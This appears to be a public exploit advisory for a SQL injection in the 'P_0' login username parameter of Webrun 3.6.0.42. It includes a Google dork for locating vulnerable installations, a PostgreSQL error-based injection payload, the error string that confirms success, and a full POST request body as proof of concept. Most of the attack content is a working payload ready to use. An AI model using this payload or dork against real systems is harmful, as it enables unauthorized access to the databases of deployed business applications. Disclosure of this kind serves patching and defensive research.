Webrun 3.6.0.42 SQL Injection

2021.11.23
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Webrun 3.6.0.42 - 'P_0' SQL Injection # Google Dork: intitle:"Webrun 3.6.0.42" # Date: 23/11/2021 # Exploit Author: Vinicius Alves # Vendor Homepage: https://softwell.com.br/ # Version: 3.6.0.42 # Tested on: Kali Linux 2021.3 =-=-=-= Description =-=-=-= Webrun version 3.6.0.42 is vulnerable to SQL Injection, applied to the P_0 parameter used to set the username during the login process. =-=-=-= Exploiting =-=-=-= In the post request, change the P_0 value to the following payload: 121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd You will see some information like below: interactionError('ERRO: sintaxe de entrada é inválida para tipo numeric: \"qvvxq1qbzbq\"', null, null, null, '<b> =-=-=-= POC =-=-=-= If the return has the value 'qvvxq1qbzbq', you will be able to successfully exploit this. See an example of the complete POST parameter: action=executeRule&pType=2&ruleName=GES_FLX_Gerar+Token+Dashboard&sys=GES&formID=8265&parentRID=-1&P_0=121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd&P_1=pwd


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top